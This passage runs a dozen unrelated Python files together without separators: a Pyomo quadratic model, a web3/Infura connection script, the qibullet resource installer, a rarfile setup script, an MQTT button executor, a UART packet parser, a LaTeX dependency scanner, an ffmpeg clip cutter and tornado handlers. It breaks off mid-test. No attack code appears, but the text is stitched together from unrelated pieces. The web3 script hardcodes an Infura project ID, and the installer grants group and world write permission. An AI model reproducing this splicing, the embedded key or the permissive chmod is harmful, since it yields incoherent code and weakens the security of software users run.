Var(within=Binary,bounds=(0,1),initialize=0) m.b79 = Var(within=Binary,bounds=(0,1),initialize=0) m.b80 = Var(within=Binary,bounds=(0,1),initialize=0) m.b81 = Var(within=Binary,bounds=(0,1),initialize=0) m.obj = Objective(expr=129255*m.b1*m.b7 - 2042*m.b1*m.b4 - 8522*m.b1*m.b10 + 36910*m.b1*m.b19 - 145869*m.b1*m.b28 + 127657*m.b1*m.b55 - 2042*m.b2*m.b5 + 129255*m.b2*m.b8 - 8522*m.b2*m.b11 + 36910*m.b2*m.b20 - 145869*m.b2*m.b29 + 127657*m.b2*m.b56 - 2042*m.b3*m.b6 + 129255*m.b3*m.b9 - 8522*m.b3*m.b12 + 36910*m.b3*m.b21 - 145869*m.b3*m.b30 + 127657*m.b3*m.b57 - 33798*m.b4*m.b7 - 39758*m.b4*m.b13 + 11107*m.b4*m.b22 + 15677*m.b4*m.b31 + 73973*m.b4*m.b58 - 33798*m.b5*m.b8 - 39758*m.b5*m.b14 + 11107*m.b5*m.b23 + 15677*m.b5*m.b32 + 73973*m.b5*m.b59 - 33798*m.b6*m.b9 - 39758*m.b6*m.b15 + 11107*m.b6*m.b24 + 15677*m.b6*m.b33 + 73973*m.b6*m.b60 - 107376*m.b7*m.b16 + 22779*m.b7*m.b25 - 25900*m.b7*m.b34 + 148330*m.b7*m.b61 - 107376*m.b8*m.b17 + 22779*m.b8*m.b26 - 25900*m.b8*m.b35 + 148330*m.b8*m.b62 - 107376*m.b9*m.b18 + 22779*m.b9*m.b27 - 25900*m.b9*m.b36 + 148330*m.b9*m.b63 + 91287*m.b10*m.b13 + 124870*m.b10*m.b16 + 162003*m.b10*m.b19 - 11373*m.b10*m.b37 - 47393*m.b10* m.b64 + 91287*m.b11*m.b14 + 124870*m.b11*m.b17 + 162003*m.b11*m.b20 - 11373*m.b11*m.b38 - 47393* m.b11*m.b65 + 91287*m.b12*m.b15 + 124870*m.b12*m.b18 + 162003*m.b12*m.b21 - 11373*m.b12*m.b39 - 47393*m.b12*m.b66 + 124357*m.b13*m.b16 + 13532*m.b13*m.b22 + 4677*m.b13*m.b40 - 1151*m.b13*m.b67 + 124357*m.b14*m.b17 + 13532*m.b14*m.b23 + 4677*m.b14*m.b41 - 1151*m.b14*m.b68 + 124357*m.b15* m.b18 + 13532*m.b15*m.b24 + 4677*m.b15*m.b42 - 1151*m.b15*m.b69 + 184*m.b16*m.b25 + 47897*m.b16* m.b43 + 44236*m.b16*m.b70 + 184*m.b17*m.b26 + 47897*m.b17*m.b44 + 44236*m.b17*m.b71 + 184*m.b18* m.b27 + 47897*m.b18*m.b45 + 44236*m.b18*m.b72 + 244323*m.b19*m.b22 + 86471*m.b19*m.b25 + 77346* m.b19*m.b46 + 79541*m.b19*m.b73 + 244323*m.b20*m.b23 + 86471*m.b20*m.b26 + 77346*m.b20*m.b47 + 79541*m.b20*m.b74 + 244323*m.b21*m.b24 + 86471*m.b21*m.b27 + 77346*m.b21*m.b48 + 79541*m.b21* m.b75 - 253603*m.b22*m.b25 - 64607*m.b22*m.b49 - 15251*m.b22*m.b76 - 253603*m.b23*m.b26 - 64607* m.b23*m.b50 - 15251*m.b23*m.b77 - 253603*m.b24*m.b27 - 64607*m.b24*m.b51 - 15251*m.b24*m.b78 + 161607*m.b25*m.b52 - 38842*m.b25*m.b79 + 161607*m.b26*m.b53 - 38842*m.b26*m.b80 + 161607*m.b27* m.b54 - 38842*m.b27*m.b81 - 141201*m.b28*m.b31 + 98698*m.b28*m.b34 + 126297*m.b28*m.b37 + 55703* m.b28*m.b46 - 109445*m.b28*m.b55 - 141201*m.b29*m.b32 + 98698*m.b29*m.b35 + 126297*m.b29*m.b38 + 55703*m.b29*m.b47 - 109445*m.b29*m.b56 - 141201*m.b30*m.b33 + 98698*m.b30*m.b36 + 126297*m.b30* m.b39 + 55703*m.b30*m.b48 - 109445*m.b30*m.b57 - 133217*m.b31*m.b34 - 85164*m.b31*m.b40 + 83576* m.b31*m.b49 + 109539*m.b31*m.b58 - 133217*m.b32*m.b35 - 85164*m.b32*m.b41 + 83576*m.b32*m.b50 + 109539*m.b32*m.b59 - 133217*m.b33*m.b36 - 85164*m.b33*m.b42 + 83576*m.b33*m.b51 + 109539*m.b33* m.b60 + 16583*m.b34*m.b43 + 79672*m.b34*m.b52 - 30705*m.b34*m.b61 + 16583*m.b35*m.b44 + 79672* m.b35*m.b53 - 30705*m.b35*m.b62 + 16583*m.b36*m.b45 + 79672*m.b36*m.b54 - 30705*m.b36*m.b63 - 23313*m.b37*m.b40 + 89988*m.b37*m.b43 + 230817*m.b37*m.b46 - 45147*m.b37*m.b64 - 23313*m.b38* m.b41 + 89988*m.b38*m.b44 + 230817*m.b38*m.b47 - 45147*m.b38*m.b65 - 23313*m.b39*m.b42 + 89988* m.b39*m.b45 + 230817*m.b39*m.b48 - 45147*m.b39*m.b66 + 64517*m.b40*m.b43 + 144765*m.b40*m.b49 + 24227*m.b40*m.b67 + 64517*m.b41*m.b44 + 144765*m.b41*m.b50 + 24227*m.b41*m.b68 + 64517*m.b42* m.b45 + 144765*m.b42*m.b51 + 24227*m.b42*m.b69 - 72744*m.b43*m.b52 - 37029*m.b43*m.b70 - 72744* m.b44*m.b53 - 37029*m.b44*m.b71 - 72744*m.b45*m.b54 - 37029*m.b45*m.b72 + 62016*m.b46*m.b49 + 4269*m.b46*m.b52 - 55976*m.b46*m.b73 + 62016*m.b47*m.b50 + 4269*m.b47*m.b53 - 55976*m.b47*m.b74 + 62016*m.b48*m.b51 + 4269*m.b48*m.b54 - 55976*m.b48*m.b75 - 18978*m.b49*m.b52 + 93391*m.b49* m.b76 - 18978*m.b50*m.b53 + 93391*m.b50*m.b77 - 18978*m.b51*m.b54 + 93391*m.b51*m.b78 + 19705* m.b52*m.b79 + 19705*m.b53*m.b80 + 19705*m.b54*m.b81 - 209910*m.b55*m.b58 - 212130*m.b55*m.b61 + 34970*m.b55*m.b64 - 105842*m.b55*m.b73 - 209910*m.b56*m.b59 - 212130*m.b56*m.b62 + 34970*m.b56* m.b65 - 105842*m.b56*m.b74 - 209910*m.b57*m.b60 - 212130*m.b57*m.b63 + 34970*m.b57*m.b66 - 105842 *m.b57*m.b75 - 636*m.b58*m.b61 + 22984*m.b58*m.b67 - 194676*m.b58*m.b76 - 636*m.b59*m.b62 + 22984 *m.b59*m.b68 - 194676*m.b59*m.b77 - 636*m.b60*m.b63 + 22984*m.b60*m.b69 - 194676*m.b60*m.b78 + 18051*m.b61*m.b70 + 14026*m.b61*m.b79 + 18051*m.b62*m.b71 + 14026*m.b62*m.b80 + 18051*m.b63*m.b72 + 14026*m.b63*m.b81 + 37051*m.b64*m.b67 - 14833*m.b64*m.b70 - 13122*m.b64*m.b73 + 37051*m.b65* m.b68 - 14833*m.b65*m.b71 - 13122*m.b65*m.b74 + 37051*m.b66*m.b69 - 14833*m.b66*m.b72 - 13122* m.b66*m.b75 - 66834*m.b67*m.b70 + 51800*m.b67*m.b76 - 66834*m.b68*m.b71 + 51800*m.b68*m.b77 - 66834*m.b69*m.b72 + 51800*m.b69*m.b78 + 108829*m.b70*m.b79 + 108829*m.b71*m.b80 + 108829*m.b72* m.b81 + 62586*m.b73*m.b76 - 78649*m.b73*m.b79 + 62586*m.b74*m.b77 - 78649*m.b74*m.b80 + 62586* m.b75*m.b78 - 78649*m.b75*m.b81 + 11036*m.b76*m.b79 + 11036*m.b77*m.b80 + 11036*m.b78*m.b81 , sense=minimize) m.c1 = Constraint(expr= m.b1 + m.b2 + m.b3 == 1) m.c2 = Constraint(expr= m.b4 + m.b5 + m.b6 == 1) m.c3 = Constraint(expr= m.b7 + m.b8 + m.b9 == 1) m.c4 = Constraint(expr= m.b10 + m.b11 + m.b12 == 1) m.c5 = Constraint(expr= m.b13 + m.b14 + m.b15 == 1) m.c6 = Constraint(expr= m.b16 + m.b17 + m.b18 == 1) m.c7 = Constraint(expr= m.b19 + m.b20 + m.b21 == 1) m.c8 = Constraint(expr= m.b22 + m.b23 + m.b24 == 1) m.c9 = Constraint(expr= m.b25 + m.b26 + m.b27 == 1) m.c10 = Constraint(expr= m.b28 + m.b29 + m.b30 == 1) m.c11 = Constraint(expr= m.b31 + m.b32 + m.b33 == 1) m.c12 = Constraint(expr= m.b34 + m.b35 + m.b36 == 1) m.c13 = Constraint(expr= m.b37 + m.b38 + m.b39 == 1) m.c14 = Constraint(expr= m.b40 + m.b41 + m.b42 == 1) m.c15 = Constraint(expr= m.b43 + m.b44 + m.b45 == 1) m.c16 = Constraint(expr= m.b46 + m.b47 + m.b48 == 1) m.c17 = Constraint(expr= m.b49 + m.b50 + m.b51 == 1) m.c18 = Constraint(expr= m.b52 + m.b53 + m.b54 == 1) m.c19 = Constraint(expr= m.b55 + m.b56 + m.b57 == 1) m.c20 = Constraint(expr= m.b58 + m.b59 + m.b60 == 1) m.c21 = Constraint(expr= m.b61 + m.b62 + m.b63 == 1) m.c22 = Constraint(expr= m.b64 + m.b65 + m.b66 == 1) m.c23 = Constraint(expr= m.b67 + m.b68 + m.b69 == 1) m.c24 = Constraint(expr= m.b70 + m.b71 + m.b72 == 1) m.c25 = Constraint(expr= m.b73 + m.b74 + m.b75 == 1) m.c26 = Constraint(expr= m.b76 + m.b77 + m.b78 == 1) m.c27 = Constraint(expr= m.b79 + m.b80 + m.b81 == 1) from web3 import Web3 import ja_language as ja_lan import pandas as pd if __name__ == "__main__": # Inital JA Language Agent ja_lan = ja_lan.language_translator() try: ja_lan_df = pd.read_pickle('ja_lan_env.pkl') apply_lan = ja_lan_df['ja_lan'][0] ja_lan.set_language_code(apply_lan) print(ja_lan.print("[INFO]: Your apply language is {%s}" % apply_lan)) except: print("[INFO]: No ja_lan_env.pkl found !") print("Set language as default 'English' ") # Connected avec infura node-services infura_url = "https://mainnet.infura.io/v3/912414023e2c4a88864de7614e5d3ee4" web3 = Web3(Web3.HTTPProvider(infura_url)) # Verifier connection print(ja_lan.print("Check the web3 is conneced or not "),web3.isConnected() ) # Checked the blockNumber print(ja_lan.print("Check the "), "blockNumber", web3.eth.blockNumber) import datetime class Template: ARGS_NUM = 1 def __init__(self): time = datetime.datetime.today() self.save_time = time.strftime('%H:%M:%S') self.save_date = time.strftime('%d.%m.%Y') self.edit_time = self.save_time self.edit_date = self.save_date def export(self): return self.__dict__ def update(self, data): if isinstance(data, dict): for feature, value in data.items(): self.__setattr__(feature, value) elif isinstance(data, (list, tuple)): for feature, value in zip(list(self.__dict__.keys())[:self.ARGS_NUM], data): self.__setattr__(feature, value) self.update_timedata() def update_timedata(self): time = datetime.datetime.today() self.edit_time = time.strftime('%H:%M:%S') self.edit_date = time.strftime('%d.%m.%Y') qibullet/tools.py #!/usr/bin/env python # coding: utf-8 import os import sys import stat import math import glob import shutil import platform import pybullet # Version tag corresponding to the latest version of the additional qibullet # ressources RESOURCES_VERSION = "1.4.3" def getDistance(point_a, point_b): [x1, y1, z1] = point_a [x2, y2, z2] = point_b return int(math.sqrt((x2 - x1)**2 + (y2 - y1)**2 + (z2 - z1)**2) * 100)\ / 100.0 def getOrientation(theta_a, theta_b): return theta_b[-1] - theta_a[-1] def computeVelocity(acc, vel_min, vel_max, dist_traveled, dist_remained): distance_acc = (vel_max * vel_max) / (2 * acc) if dist_traveled < distance_acc: vel_computed = (vel_max - vel_min) *\ dist_traveled / distance_acc + vel_min if dist_traveled >= distance_acc: vel_computed = vel_max if dist_remained < distance_acc: vel_computed = (vel_max - vel_min) *\ dist_remained / distance_acc + vel_min return vel_computed def _get_resources_root_folder(): # pragma: no cover """ Returns the path to the resources' root folder (.qibullet folder in the user's home). The path will be returned even if the installation folder does not yet exist """ if platform.system() == "Windows": return os.path.expanduser("~") + "\\.qibullet" else: return os.path.expanduser("~") + "/.qibullet" def _get_resources_folder(): # pragma: no cover """ Returns the path to the resources folder specific to the current qibullet version (.qibullet/resources_version folder in the user's home). The path will be returned even if the installation folder does not yet exists """ if platform.system() == "Windows": return _get_resources_root_folder() + "\\" + RESOURCES_VERSION else: return _get_resources_root_folder() + "/" + RESOURCES_VERSION def _install_resources(agreement=False): # pragma: no cover """ Extracts the robot meshes and install the urdfs and the meshes, using the provided installers. The resources will be installed in the user's home folder (under the .qibullet folder) """ # If the install folder already exists, remove it if not _uninstall_resources(): print( "Cannot install the ressources, try to manually remove the " + _get_resources_root_folder() + " folder first.") return resources_folder = _get_resources_folder() # Displaying the qiBullet version corresponding to the extra resources print("\nInstalling resources for qiBullet") # Ask for user feedback before installing everything. try: assert not agreement if sys.version_info > (3, 0): answer = input( "\nThe robot meshes and URDFs will be installed in the " + resources_folder + " folder. You will need to agree to" " the meshes license in order to be able to install them." " Continue the installation (y/n)? ") else: answer = raw_input( "\nThe robot meshes and URDFs will be installed in the " + resources_folder + " folder. You will need to agree to" " the meshes license in order to be able to install them." " Continue the installation (y/n)? ") except AssertionError: answer = "y" if answer.lower() == "y": print( "Installing the meshes and URDFs in the " + resources_folder + " folder...") else: print("The meshes and URDFs won't be installed.") return # Create the resources root folder os.mkdir(_get_resources_root_folder()) # Create the version specific resources folder os.mkdir(resources_folder) # Fetch the correct installer and extract the robot meshes in the install # folder if platform.system() == "Windows": data_folder = os.path.dirname(os.path.realpath(__file__)) +\ "\\robot_data\\" else: data_folder = os.path.dirname(os.path.realpath(__file__)) +\ "/robot_data/" sys.path.insert(0, data_folder + "installers") major = sys.version_info[0] minor = sys.version_info[1] print("Python " + str(major) + "." + str(minor) + " detected") if major == 3: if minor == 5: import meshes_installer_35 as meshes_installer elif minor == 6: import meshes_installer_36 as meshes_installer elif minor == 7: import meshes_installer_37 as meshes_installer elif minor == 8: import meshes_installer_38 as meshes_installer elif minor == 9: import meshes_installer_39 as meshes_installer else: print("Uncompatible version of Python 3") return elif major == 2: if minor == 7: import meshes_installer_27 as meshes_installer else: print("Uncompatible version of Python 2") return else: print("Uncompatible Python version") return if meshes_installer._install_meshes(resources_folder, agreement=agreement): print("Resources correctly extracted") else: print("Could not extract the resources") return # Install the robot URDFs in the install folder print("Installing the robot URDFs...") for urdf in glob.glob(data_folder + "*.urdf"): shutil.copy2(urdf, resources_folder) # Grant writing permissions on the ressources if platform.system() != "Windows": permissions = stat.S_IWOTH | stat.S_IWGRP os.chmod( _get_resources_root_folder(), permissions | os.stat(_get_resources_root_folder()).st_mode) for root, folders, files in os.walk(_get_resources_root_folder()): for folder in folders: folder_path = os.path.join(root, folder) os.chmod( folder_path, permissions | os.stat(folder_path).st_mode) for ressource_file in files: file_path = os.path.join(root, ressource_file) os.chmod(file_path, permissions | os.stat(file_path).st_mode) print( "(To remove the installed resources, use the _uninstall_resources " "method of qibullet.tools, or remove the folder manually)") print("Installation done, resources in " + resources_folder) def _uninstall_resources(): # pragma: no cover """ Uninstall the robot meshes and the urdfs from the user's home folder (removing the .qibullet folder in the user's home). Will return True if the .qibullet folder doesn't exit in the user's home anymore """ if os.path.exists(_get_resources_root_folder()): try: shutil.rmtree(_get_resources_root_folder()) except OSError: return False return True def _check_resources_installed(): # pragma: no cover """ Checks if the resources (URDFs and robot meshes) are install in the user's home folder (in the .qibullet folder) Returns: installed - boolean, True if the meshes are installed, False otherwise """ install_folder = os.path.dirname(os.path.realpath(__file__)) try: assert os.path.exists(_get_resources_root_folder()) except AssertionError: print("\nThe qibullet ressources are not yet installed.") return False try: assert os.path.exists(_get_resources_folder()) except AssertionError: print("\nThe qibullet ressources are not up to date.") return False try: if platform.system() == "Windows": assert os.path.exists(_get_resources_folder() + "\\nao.urdf") assert os.path.exists(_get_resources_folder() + "\\romeo.urdf") assert os.path.exists(_get_resources_folder() + "\\pepper.urdf") assert os.path.exists(_get_resources_folder() + "\\meshes") else: assert os.path.exists(_get_resources_folder() + "/nao.urdf") assert os.path.exists(_get_resources_folder() + "/romeo.urdf") assert os.path.exists(_get_resources_folder() + "/pepper.urdf") assert os.path.exists(_get_resources_folder() + "/meshes") return True except AssertionError: print("\nThe qibullet ressources are up to date but seem incomplete.") return False import numpy as np from ModularSlug import Aplysia, MyNeuralModel, MyMuscleModel n_steps = 10 params = [] x0 = [0, 0, 0, 0] # corresponds to MyNeuralModel.neural_outputs_dtype neural_model = MyNeuralModel(params, n_steps, x0) params = [] x0 = [0, 0, 0] # corresponds to MyMuscleModel.muscle_outputs_dtype muscle_model = MyMuscleModel(params, n_steps, x0) aplysia = Aplysia(n_steps, neural_model, muscle_model) aplysia.run() aplysia.summarize() print() print('Final value of B3:', aplysia.neural_outputs['B3']) print('Final value of I2:', aplysia.muscle_outputs['I2']) """Setup script for rarfile. """ import re from setuptools import setup vrx = r"""^__version__ *= *['"]([^'"]+)['"]""" src = open("rarfile.py").read() ver = re.search(vrx, src, re.M).group(1) ldesc = open("README.rst").read().strip() sdesc = ldesc.split('\n')[0].split(' - ')[1].strip() setup( name="rarfile", version=ver, description=sdesc, long_description=ldesc, author="", license="ISC", author_email="", url="https://github.com/markokr/rarfile", py_modules=['rarfile'], keywords=['rar', 'unrar', 'archive'], classifiers=[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: ISC License (ISCL)", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries :: Python Modules", "Topic :: System :: Archiving :: Compression", ] ) from kopper.kopper import Kopper from kopper.constants.stations import STATIONS from kopper.constants.train_type import TRAIN_TYPE from models.dao.aps.ApSchedulerEvent import ApSchedulerEvent from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent from models.dao.aps.ApSchedulerJob import ApSchedulerJob src/button/_action_executor.py import src.button._mqtt_sender as mqtt_sender import src.button._domain as domain from typing import Dict, List import src.irulez.log as log from datetime import datetime import src.output_status.ServiceClient as ServiceClient import src.irulez.util as util logger = log.get_logger('button_processor') class ActionExecutor: """ Contains logic for executing all kinds of actions """ def __init__(self, sender: mqtt_sender.MqttSender, status_service: ServiceClient.StatusServiceClient): self.__sender = sender self.__status_service = status_service def check_condition(self, condition: domain.Condition): if condition is None: return True if condition.condition_type == domain.ConditionType.TIME and isinstance(condition, domain.TimeCondition): return condition.from_time <= datetime.now().time() <= condition.to_time elif condition.condition_type == domain.ConditionType.OUTPUT_PIN and \ isinstance(condition, domain.OutputPinCondition): return condition.status == self.__status_service.get_arduino_pin_status(condition.output_pin.parent, condition.output_pin.number) elif condition.condition_type == domain.ConditionType.LIST and isinstance(condition, domain.ConditionList): for condition in condition.conditions: if condition.operator == domain.Operator.AND: for condition in condition.conditions: if not self.check_condition(condition): return False return True # Otherwise it's OR for condition in condition.conditions: if self.check_condition(condition): return True return False else: logger.warning("Condition not caught") return False def process_notification(self, action: domain.Action): if action.notifications is None: return for notification in action.notifications: topic = notification.get_topic_name() payload = notification.get_payload() self.__sender.publish_notification(topic, payload) def execute_action(self, action: domain.Action, pins_to_switch: Dict[str, List[domain.IndividualAction]], pins_to_dim: Dict[str, List[domain.IndividualDimAction]], last_light_values_to_update: Dict[int, int]) -> None: """ Performs the given action by manipulating the given dictionaries with pins. """ if self.check_condition(action.get_condition()): logger.info(f"Process action with type '{action.action_type}'") if isinstance(action, domain.OnAction): action.perform_action(pins_to_switch) elif isinstance(action, domain.OffAction): action.perform_action(pins_to_switch) elif isinstance(action, domain.ToggleAction): master = self.__status_service.get_arduino_pin_status(action.master.parent, action.master.number) action.perform_action(pins_to_switch, master) elif isinstance(action, domain.OnDimmerAction): action.perform_action(pins_to_dim) elif isinstance(action, domain.OffDimmerAction): action.perform_action(pins_to_dim) elif isinstance(action, domain.ToggleDimmerAction): master_json = self.__status_service.get_arduino_dim_pin_status(action.master.parent, action.master.number) # JSON contains 'state' and 'direction' master = util.deserialize_json(master_json) state = util.get_int_from_json_object(master, 'state') direction = util.get_str_from_json_object(master, 'direction') last_light_value_optional = None if action.master_dim_id is not None: last_light_value_optional = self.__status_service.get_dimmer_light_value(action.master.parent, action.master_dim_id) last_light_value = 100 if last_light_value_optional is not None: last_light_value = last_light_value_optional action.perform_action(pins_to_dim, last_light_values_to_update, state, direction, last_light_value) else: logger.error(f"Undefined action of type '{action.action_type}' ({type(action)})") else: logger.info(f"Condition not met") def execute_actions(self, actions: List[domain.Action], button: domain.ButtonPin, arduino_name: str): pins_to_switch = {} pins_to_dim = {} last_light_values_to_update = {} logger.debug(f"Publish immediate actions") for action in actions: self.execute_action(action, pins_to_switch, pins_to_dim, last_light_values_to_update) self.__sender.publish_last_light_values(last_light_values_to_update) self.__sender.publish_relative_action(pins_to_switch) self.__sender.publish_dimmer_module_action(pins_to_dim, arduino_name, button.number) from .PacketStream import * state_wait_sync = 0 state_wait_header = 1 state_wait_data = 2 sync = 0x3c class UartPacket(PacketStream): def __init__(self, stream): self.stream = stream stream.recv = self.on_recv self.state = 0 self.header = bytes() self.data = bytes() self.recv=None def on_recv(self, pkt): if self.state == state_wait_sync: drop=len(pkt) for i,b in enumerate(pkt): if b == sync: self.state = state_wait_header self.header = bytes() self.data = bytes() drop=i break else: print('not sync: ', b) pkt = pkt[drop+1:] if self.state == state_wait_header: need = 3-len(self.header) self.header += pkt[:need] pkt = pkt[need:] if len(self.header) >= 3: C = self.header[0] T = self.header[1] L = self.header[2] CH = C >> 4 if CH != ((T + L) & 0xf): print('header bad') self.state = state_wait_sync else: self.state = state_wait_data if self.state == state_wait_data: C = self.header[0] L = self.header[2] need = L-len(self.data) self.data += pkt[:need] pkt = pkt[need:] need = L-len(self.data) if need == 0: CP = C & 0xf c=0 for i in self.data: c += i if CP != (c & 0xf): print('data checksum is bad') return msg = bytes([self.header[1]]) + self.data if self.recv: self.recv(msg) self.state = state_wait_sync if pkt: self.on_recv(pkt) def send(self, x): binary = x ptype = binary[0] payload = len(binary)-1 header_checksum = (ptype + payload) & 0xf payload_checksum = 0 for i in binary[1:]: payload_checksum += i payload_checksum &= 0xf checksum = (header_checksum << 4) | payload_checksum packet = b'\x3c' + bytes([checksum, ptype, payload]) + binary[1:] self.stream.send(packet) python/maketexdeps.py #!/usr/bin/env python3 import argparse import re import os import os.path class Tracker: def __init__(self): self.checked = set() self.unchecked = set() def add(self, items): for i in items: self.unchecked.add(i) def pop(self): try: item = self.unchecked.pop() self.checked.add(item) return item except KeyError: return None def tracked(self): return self.checked class Matcher: """A regexp and a handler in case of match""" def __init__(self, pat, handler): self.pat = re.compile(pat) self.handler = handler def process(self, text): m = self.pat.match(text) if m: return self.handler(m) return None def always_none(m): """Always return None""" return None def first_group(m): """Returns the first group of the match""" return m.group(1) def second_group(m): """Returns the first group of the match""" return m.group(2) def process_line(line, matchers): """Process line with every Matcher until a match is found""" result = None for m in matchers: result = m.process(line) if result: break return result def handle_figure(m): name = m.group(1) if len(os.path.dirname(name)) != 0: return name ext = os.path.splitext(name)[1] if ext == ".pdf": folder = "figures" else: folder = "img" path = os.path.join(folder, name) return path def handle_tex(m): path = '{}.tex'.format(m.group(1)) return os.path.relpath(path) tex_matchers = ( Matcher(r'^[^%]*\\includegraphics(?:\[[^]]*\])?\{([^}]+)\}', handle_figure), Matcher(r'^[^%]*\\input\{([^}]+)\}', handle_tex) ) lang_re = re.compile(r'\\LANG') file_re = re.compile(r'-([a-z]{2})\.') def scan_tex_file(tex): lang = None m = file_re.search(tex) if m: lang = m.group(1) deps = set() with open(tex) as f: for l in f: path = process_line(l, tex_matchers) if path: if lang: path = lang_re.sub(lang, path) deps.add(path) return deps if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('file', help='input file') parser.add_argument("-o", "--out", help="output file") parser.add_argument("-t", "--target", help="target file") args = parser.parse_args() input_file = args.file output_file = args.out target_file = args.target tracker = Tracker() figures = set() f = input_file while f: ext = os.path.splitext(f)[1] if ext == ".tex": new_deps = scan_tex_file(f) tracker.add(new_deps) elif ext == ".pdf": figures.add(f) f = tracker.pop() deps = tracker.tracked() with open(output_file, 'w') as f: f.write('{}: {}\n\n'.format(output_file, input_file)) f.write('{}: \\\n'.format(target_file)) f.write('\t{}'.format(' \\\n\t'.join(deps))) f.write('\n\n') if len(figures): f.write('FIGURES +=\\\n') f.write('\t{}'.format(' \\\n\t'.join(figures))) f.write('\n\n') # f.write(''.join([d + ':\n' for d in deps])) # -*- coding: utf-8 -*- # Description: generate audio clips for lines, words, and syllables import argparse import json import os from pprint import pprint import re import subprocess import sys # input parser = argparse.ArgumentParser() parser.add_argument('-in', dest="INPUT_FILE", default="data/still_i_rise.json", help="Path to input aligned transcript json file") parser.add_argument('-au', dest="INPUT_AUDIO_FILE", default="still_i_rise.wav", help="Path to audio file file") parser.add_argument('-out', dest="OUTPUT_DIR", default="clips/", help="Path to clip directory") parser.add_argument('-min', dest="MIN_DURATION", type=float, default=0.1, help="Minimum duration of a clip") parser.add_argument('-pa', dest="PAD", type=float, default=0.02, help="Amount of seconds to pad before and after") parser.add_argument('-fa', dest="FADE", type=float, default=0.02, help="Amount of seconds to fade before and after") parser.add_argument('-o', dest="OVERRIDE", type=int, default=0, help="Override existing syllable data") parser.add_argument('-fe', dest="FILE_EXT", default=".wav", help="File extension of audio clips") # init input args = parser.parse_args() MIN_DURATION = args.MIN_DURATION PAD = args.PAD FADE = args.FADE OVERRIDE = args.OVERRIDE FILE_EXT = args.FILE_EXT types = ["lines", "words", "syllables", "nonwords", "pauses"] # create directories if not os.path.exists(args.OUTPUT_DIR): os.makedirs(args.OUTPUT_DIR) for t in types: if not os.path.exists(args.OUTPUT_DIR + t + "/"): os.makedirs(args.OUTPUT_DIR + t + "/") data = {} with open(args.INPUT_FILE) as f: data = json.load(f) clips = [] lines = data["lines"] words = data["words"] nonwords = data["nonwords"] pauses = data["pauses"] # create clips for i, line in enumerate(lines): line.update({"type": "lines"}) clips.append(line) for i, word in enumerate(words): word.update({"type": "words"}) clips.append(word) for j, syllable in enumerate(word["syllables"]): syllable.update({"type": "syllables"}) clips.append(syllable) for i, word in enumerate(nonwords): word.update({"type": "nonwords"}) clips.append(word) for i, word in enumerate(pauses): word.update({"type": "pauses"}) clips.append(word) # generate clips for i, clip in enumerate(clips): fname = args.OUTPUT_DIR + clip["type"] + '/' + clip["name"] + FILE_EXT fnameTmp = args.OUTPUT_DIR + clip["type"] + '/' + clip["name"] + "_temp" + FILE_EXT if os.path.isfile(fname) and not OVERRIDE: continue start = max(round(clip["start"] - PAD, 2), 0) end = round(clip["end"] + PAD, 2) dur = end - start if dur < MIN_DURATION: end = round(start + MIN_DURATION, 2) # cut the clip command = ['ffmpeg', '-i', args.INPUT_AUDIO_FILE, '-ss', str(start), '-to', str(end), '-c', 'copy', fnameTmp, '-y'] # print " ".join(command) finished = subprocess.check_call(command) # fade the clip st = round(end - start - FADE, 2) command = ['ffmpeg', '-i', fnameTmp, '-af', "afade=t=in:ss=0:d="+str(FADE)+",afade=t=out:st="+str(st)+":d="+str(FADE), fname, '-y'] # print " ".join(command) finished = subprocess.check_call(command) # delete temp file os.remove(fnameTmp) run_async/handlers.py """Collection of handler classes (dictionary-like objects) """ # Author: <> # Copyright (c) 2015 <> # License: BSD 3 clause from collections import defaultdict # from queue import Queue from multiprocessing import SimpleQueue try: from tornado.websocket import WebSocketHandler except ImportError: pass from .settings import JS_ROLE from .utils import format_ws_connection_id class Handler(): """Container object for data management. The handler contains a dictionary whose default type is determined according to the class provided in the constructor""" def __init__(self, factory=None): if factory is None: factory = str # Default type of data self._data = defaultdict(factory) def add(self, key, value): self._data[key] = value def remove(self, key): _ = self._data.pop(key, None) def get(self, key): return self._data.get(key, None) def __contains__(self, key): return key in self._data @property def entries(self): return list(self._data.keys()) class WebSocketConnectionHandler(Handler): """Handler for `tornado.websocket.WebSocketHandler` connections. Entries' keys are the _connection_id[s], namely --- """ def __init__(self): super(WebSocketConnectionHandler, self).__init__( factory=WebSocketHandler) class ResultCache(Handler): """Handler for caching execution results, namely JSON (string) output. Entries' keys are the (clients) _connection_id[s], namely --- """ def __init__(self): super(ResultCache, self).__init__(factory=str) def add(self, session_id, value): cache_id = format_ws_connection_id(JS_ROLE, session_id) super(ResultCache, self).add(cache_id, value) class ExecutionHandler(Handler): """Handler to store the execution queues in order to make clients to wait on correct thread queues. Entries' keys are the session_id[s], namely "one queue per session_id". """ def __init__(self): super(ExecutionHandler, self).__init__(factory=SimpleQueue) 0 from IMLearn.learners import UnivariateGaussian, MultivariateGaussian import numpy as np import plotly.graph_objects as go import plotly.io as pio pio.templates.default = "simple_white" def test_univariate_gaussian(): print("********* Q1 *********") # Question 1 - Draw samples and print fitted model uni = UnivariateGaussian() X = np.random.normal(10, 1, 1000) uni.fit(X) print((uni.mu_, uni.var_)) # Question 2 - Empirically showing sample mean is consistent print("********* Q2 *********") ms = np.linspace(10, 1000, num=100).astype(int) distances = [] for m in ms: distances.append(np.abs(uni.mu_ - np.mean(X[0:m]))) go.Figure([go.Scatter(x=ms, y=distances, mode='markers+lines', name=r'$\widehat\mu$')], layout=go.Layout(title=r"$\text{Distance between the estimated and true value of the expectation}$", xaxis_title=r"$\text{Number of samples}$", yaxis_title="r$|\hat\mu - \mu|$", height=350)).show() print("********* Q3 *********") # Question 3 - Plotting Empirical PDF of fitted model pdfs = uni.pdf(X) go.Figure([go.Scatter(x=X, y=pdfs, mode='markers', name=r'$\widehat\mu$')], layout=go.Layout(title=r"$\text{Sample values and corresponding PDF's}$", xaxis_title="$\\text{ Sample values }$", yaxis_title="$\\text{PDF of sample value}$", height=300)).show() def test_multivariate_gaussian(): # Question 4 - Draw samples and print fitted model print("********* Q4 *********") mult_mu = np.array([0, 0, 4, 0]) mult_cov = np.array([[1, 0.2, 0, 0.5], [0.2, 2, 0, 0], [0, 0, 1, 0], [0.5, 0, 0, 1]]) X = np.random.multivariate_normal(mult_mu, mult_cov, size=(1000,)) multi = MultivariateGaussian() multi.fit(X) print("Estimated 